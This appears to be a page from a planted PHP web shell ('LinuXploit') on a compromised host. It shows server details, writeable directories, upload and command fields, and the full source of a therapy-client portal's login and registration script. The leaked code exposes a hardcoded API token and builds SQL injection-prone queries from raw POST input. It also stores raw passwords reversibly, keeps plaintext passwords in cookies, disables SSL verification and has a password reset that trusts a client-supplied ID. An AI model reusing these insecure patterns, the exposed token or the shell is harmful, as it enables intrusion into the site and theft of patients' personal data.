403Webshell
Server IP : 74.208.236.18  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux infong654 4.4.400-icpu-108 #2 SMP Wed Feb 11 10:12:42 UTC 2026 x86_64
User : u39365822 ( 135825)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /homepages/7/d147067425/htdocs/client_user_2/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /homepages/7/d147067425/htdocs/client_user_2/includes/main.php
<?php
ob_start();
session_start();
require "./db_con_get.php";
function call_api($fields, $url) {
    //API call 
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

    $headers = array(
    "X-Custom-Header: value",
    "Content-Type: application/json",
    "API-TOKEN:t68VRoQGFSxHVR3dskZvRKpe8Pb1rQrm",
    );
    curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
    // Api call footer
    curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($fields));
    //for debug only!
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);

    $resp = curl_exec($curl);
    curl_close($curl);
    return json_decode($resp);
    //var_dump($resp);
}
if(isset($_POST['btn-save'])) {
    
	$first_name = $_POST['first_name'];
	$last_name = $_POST['last_name'];
	$full_name=$first_name.' '.$last_name;
	$email = $_POST['email'];
	$hashpassword = @password_hash($_POST['password'], PASSWORD_DEFAULT);
    $post_therapist_id = @$_POST['referral'];
    $status = 0;		
	$sql = "SELECT * FROM `user` WHERE EmailID = '".@base64_encode($email)."'";
	$resultset = mysqli_query($con, $sql) or die("database error:". mysqli_error($con));
	$row = mysqli_fetch_assoc($resultset);

    //get therapist email
    $thData = mysqli_query($con, "SELECT `email_id` FROM `therapist` WHERE `id` = '".@$post_therapist_id."'")
     or die("database error:". mysqli_error($con));
    $rowTh = mysqli_fetch_assoc($thData);

    if(mysqli_num_rows($resultset) > 0 && $row['therapist_id'] == $post_therapist_id) {

        //Otp being send ....
        $otp = rand(100000,999999);
		// Send OTP
		// $to = $email;
        // $subject = 'One Time Password for Registeration';  
        // $htmlContent = "One Time Password for a client account signup:<br/><br/>" . $otp;	   
        // $headers = "From: clients@revealmyway.com\r\n";
        // $headers .= "MIME-Version: 1.0" . "\r\n";
        // $headers .= "Content-type: text/html; charset=UTF-8" . "\r\n";
        // $headers .= "Reply-To: noreply@revealmyway.com\r\n";
        // $headers .= "X-Mailer: PHP/".phpversion();
        // if(mail($to, $subject, $htmlContent, $headers)) {
        //     $result = mysqli_query($con,"INSERT INTO client_otp_auth_expiry(client_email, otp_code, is_expired, created_at) VALUES ('".@$email."', '" . $otp . "', 0, '" . date("Y-m-d H:i:s"). "')");
		// 	$current_id = mysqli_insert_id($con);
		// 	if(!empty($current_id)) {
		// 		$msg="success1";
		// 	}
        // } else {
        //     $msg="Email could not be sent...";
        // }
        $initF = @mb_substr($first_name, 0, 1);
        $initL = @mb_substr($last_name, 0, 1);
        $apiRes = call_api([
            'email' => @base64_decode($row['EmailID']), 
            'password' => @$row['praw'], 
            'first_name' => @$first_name,
            'last_name' => @$last_name,
            'gender' => @$row['Gender'],
            'age' => @$row['Age'],
            'therapist_email' => @$rowTh['email_id'],
            'initials' => @$initF.@$initL
        ], 'http://apis.revealmyway.com:4000/therapist_api/public/api/user/register');
        
        if(@$apiRes->guid != '') {
            
            $updateReg = "UPDATE `user` SET `FirstName` = '".@base64_encode($first_name)."', `LastName` = '".@base64_encode($last_name)."', 
            `Gender` = '".@$_POST['gender']."', `Age` = '".@$_POST['age']."', `PasswordHash` = '".$hashpassword."', 
            `praw` = '".@base64_encode($_POST['password'])."' WHERE 
            `UserID` = '".$row['UserID']."' AND `therapist_id` = '".@$post_therapist_id."'";
            mysqli_query($con, $updateReg) or die("database error:". mysqli_error($con));

            mysqli_query($con, "UPDATE `user` SET `GuidReference` = '".$apiRes->guid."', `IsActive` = '1' WHERE `UserID` = '".@$row['UserID']."'") or die(mysqli_error($con));
            $msg = "success2";
        } else {
            $msg = @$apiRes->message;
        }
        
    } else {
        $msg="1";
    }
	
	echo $msg;
}
if(isset($_POST['btn-login'])) {
	$username = $_POST['username'];
	$password = $_POST['password'];
    $sql = "select * from user where `EmailID` = '".@base64_encode($username)."' AND `isArchived` = '0'";
    //$sql = "select * from user where `therapist_id` = '8' AND `isArchived` = '0'";
    $result = mysqli_query($con, $sql) or die(mysqli_error($con));
    $count = mysqli_num_rows($result);
    //echo $hashpassword = @password_hash('123456', PASSWORD_DEFAULT);exit;
	//$hashPass = @sha1($_POST['password']);
    //$apiRes = call_api(['email' => $username, 'password' => $password], 'http://apis.revealmyway.com:4000/therapist_api/public/api/user/login');
    //print_r($apiRes);

    if (@$count > 0) {
        $row = mysqli_fetch_assoc($result);
        $passHash = $row['PasswordHash'];
        if(password_verify($password, $passHash)) {
            $_SESSION['CURRENT_CLIENT'] = $row;
            unset($_SESSION['CURRENT_CLIENT']['PasswordHash']);
            $msg="success1";
            // generate OTP
            $otp = rand(100000,999999);
            // Send OTP
            $to=base64_decode($row['EmailID']);
            $from = 'clients@revealmyway.com'; 
            $fromName = 'Reveal Clients Account'; 
            $subject = 'One Time Password for Login';  
            $htmlContent = "One Time Password for Client login authentication is:<br/><br/>" . $otp;	   
            $headers = "From: $fromName"." <".$from.">"; 
            $semi_rand = md5(time());  
            $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";  
            $headers .= "\nMIME-Version: 1.0\n" . "Content-Type: multipart/mixed;\n" . " boundary=\"{$mime_boundary}\""; 
            $message = "--{$mime_boundary}\n" . "Content-Type: text/html; charset=\"UTF-8\"\n" . 
            "Content-Transfer-Encoding: 7bit\n\n" . $htmlContent . "\n\n";   
            $message .= "--{$mime_boundary}--"; 
            $returnpath = "-f" . $from;
            if(mail($to, $subject, $message, $headers,$returnpath)) {
                $result = mysqli_query($con,"INSERT INTO client_otp_auth_expiry(otp_code,client_email,is_expired,created_at) VALUES ('" . $otp . "', '".base64_encode($row['EmailID'])."', 0, '" . date("Y-m-d H:i:s"). "')");
                $current_id = mysqli_insert_id($con);
                if(!empty($current_id)) {
                    $success=1;
                }
                
            } else {
                $msg="Email could not be sent...";
            }
        } else {
            $msg="password is incorrect";
        }

        if(@$_POST["remember_me"]=='1' || @$_POST["remember_me"]=='on'){
            $hour = time() + 3600 * 24 * 30;
            setcookie('username', $username, $hour, '/');
            setcookie('password', $password, $hour, '/');
        } else {
            $hour = time();
            setcookie("username", "", $hour,'/');
            setcookie("password", "", $hour,'/');
        }

        
        
    } else {
        $msg="Email ID is incorrect";
	}
	echo $msg;	
}

if(isset($_POST['otp_code'])) {
    if(!empty($_SESSION['CURRENT_CLIENT'])) {
        $postOTP = $_POST['otp_code'];
        $result = mysqli_query($con,"SELECT * FROM client_otp_auth_expiry WHERE otp_code='" . $postOTP . "' AND is_expired!=1 AND NOW() <= DATE_ADD(created_at, INTERVAL 1 HOUR)") or die("database error:". mysqli_error($con));
        $count  = mysqli_num_rows($result);
        if(!empty($count)) {
            $result = mysqli_query($con,"UPDATE client_otp_auth_expiry SET is_expired = 1 WHERE otp_code = '" . $postOTP . "'");
            $_SESSION['loggedinC'] = true;
            $msg = "success2";	
        } else {
            //$success = "success1";
            $msg = "Invalid OTP!";
        }	
    } else {
        $msg="Sorry but your session has expired. Please try login again..";
    }
    echo $msg;	
}
if(isset($_POST['otp_client_reg'])) {
    
        $postOTP = $_POST['otp_client_reg'];
        $result = mysqli_query($con,"SELECT * FROM client_otp_auth_expiry WHERE otp_code='" . $postOTP . "' AND is_expired!=1 AND NOW() <= DATE_ADD(created_at, INTERVAL 1 HOUR)") or die("database error:". mysqli_error($con));
        $resArray = mysqli_fetch_array($result);
        
        $count  = mysqli_num_rows($result);
        
        if(@$count > 0) {
            $result = mysqli_query($con,"UPDATE client_otp_auth_expiry SET is_expired = 1 WHERE otp_code = '" . $postOTP . "'");           
            $sql = "SELECT * FROM user WHERE `EmailID` = '".@$resArray['client_email']."'";
            $userRes = mysqli_query($con, $sql) or die(mysqli_error($con));
            $userArr = mysqli_fetch_array($userRes);
            $countRes = mysqli_num_rows($userRes);
            
            if(@$countRes > 0) {
                $apiRes = call_api([
                    'email' => @base64_decode($userArr['EmailID']), 
                    'password' => @$userArr['praw'], 
                    'first_name' => @$userArr['FirstName'],
                    'last_name' => @$userArr['LastName'],
                    'gender' => @$userArr['Gender'],
                    'age' => @$userArr['Age']
                ], 'http://apis.revealmyway.com:4000/therapist_api/public/api/user/register');
                
                if(@$apiRes->guid != '') {
                    mysqli_query($con, "UPDATE `user` SET `GuidReference` = '".$apiRes->guid."', `IsActive` = '1' WHERE `UserID` = '".@$userArr['UserID']."'") or die(mysqli_error($con));
                    $msg = "success2";
                } else {
                    $msg = @$apiRes->message;
                }
            }
            	
        } else {
            $msg = "Invalid OTP!";
        }	
    
    echo $msg;	
}
if(isset($_POST['otp_code_reg'])) {
    $postOTP = $_POST['otp_code_reg'];
    $result = mysqli_query($con,"SELECT * FROM otp_auth_expiry WHERE otp_code='" . $postOTP . "' AND is_expired!=1 AND NOW() <= DATE_ADD(created_at, INTERVAL 1 HOUR)") or die("database error:". mysqli_error($con));
    $row = mysqli_fetch_assoc($result);
    $count  = mysqli_num_rows($result);
    if(!empty($count)) {
        $upTherapist = mysqli_query($con, "UPDATE `therapist` SET `status` = '1' WHERE `email_id` = '".$row['therapist_email']."'") 
        or die("Error updating therapist after OTP confirmation: ". mysqli_error($con));
        $result = mysqli_query($con,"UPDATE otp_auth_expiry SET is_expired = 1 WHERE otp_code = '" . $postOTP . "'");
        $msg = "success2";	
    } else {
        //$success = "success1";
        $msg = "Invalid OTP!";
    }	
    
    echo $msg;	
}

if(isset($_POST['btn-forget'])) {
	$email = mysqli_real_escape_string($con,$_POST['email']);
    $sql = "SELECT * FROM user WHERE `EmailID` = '".base64_encode($email)."'";
    $result = mysqli_query($con,$sql) or die(mysqli_error($con));
    $count_ther = mysqli_num_rows($result);
    if($count_ther>0) {
    $row_ther = mysqli_fetch_assoc($result);
    $token = bin2hex(openssl_random_pseudo_bytes(16));
    $Update_q=mysqli_query($con,"update `user` set `token`='".$token."' where `EmailID`='".base64_encode($email)."' ") or die(mysqli_error($con));
    if($Update_q>0){
    $token=$token;
    $to=base64_decode($row_ther['EmailID']);
    $from = 'client@revealmyway.com'; 
    $fromName = 'Reveal Client Account'; 
    $subject = 'Password Reset link';  
    $htmlContent = '<strong>Click here to Reset Your account Password</strong> https://clients.revealmyway.com/reset-password.php?token='.$token;	   
    $headers = "From: $fromName"." <".$from.">"; 
    $semi_rand = md5(time());  
    $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";  
    $headers .= "\nMIME-Version: 1.0\n" . "Content-Type: multipart/mixed;\n" . " boundary=\"{$mime_boundary}\""; 
    $message = "--{$mime_boundary}\n" . "Content-Type: text/html; charset=\"UTF-8\"\n" . 
    "Content-Transfer-Encoding: 7bit\n\n" . $htmlContent . "\n\n";   
    $message .= "--{$mime_boundary}--"; 
    $returnpath = "-f" . $from;
    if(mail($to, $subject, $message, $headers,$returnpath)) {
    $msg="success";
    }else {
    $msg="Email could not be sent...";
    }
    }
    }else{
    $msg= "Incorrect Email-ID"; 
    }
    echo $msg;	
}
if(isset($_POST['btn-reset'])) { 
    $password = mysqli_real_escape_string($con,$_POST['password']);
    $confirm_password = mysqli_real_escape_string($con,$_POST['confirm_password']);
    $token = mysqli_real_escape_string($con,$_POST["token"]);
    if($password!=$confirm_password){
        $msg= "Password do not match, both password should be same.";
    }
    if(empty($token) && !isset($token)){
        $msg.= "Invalid Token";
    }
    if(empty($msg)) {
        $newpassword = @password_hash($_POST['password'], PASSWORD_DEFAULT);
        
        $update_data = mysqli_query($con, "UPDATE `user` SET `PasswordHash` = '".mysqli_real_escape_string($con,$newpassword)."', `token` = '' , `UpdatedOn` = now() WHERE `UserID`='".base64_decode($_POST['token'])."'") or die(mysqli_error($con));
        if($update_data){
            $msg='success';
        } else {
            $msg= "Something Error.Please Contact Administrator";	
        }  
    }
    echo $msg;	
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit